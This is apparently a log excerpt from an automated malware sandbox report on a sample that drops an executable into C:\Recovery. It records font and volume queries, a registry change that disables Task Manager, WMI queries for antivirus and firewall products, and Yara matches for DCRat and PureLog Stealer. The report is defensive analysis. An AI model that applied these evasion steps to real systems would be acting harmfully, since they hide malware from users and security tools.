                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0028DF1E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027B146 GetVersionExW,0_2_0027B146
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Disable Task Manager(disabletaskmgr)
                        Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                        Disables the Windows task manager (taskmgr)
                        Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected DCRat
                        Source: Yara matchFile source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ComrefNetsvc.exe PID: 7956, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 8.0.ComrefNetsvc.exe.10000.0.unpack, type: UNPACKEDPE
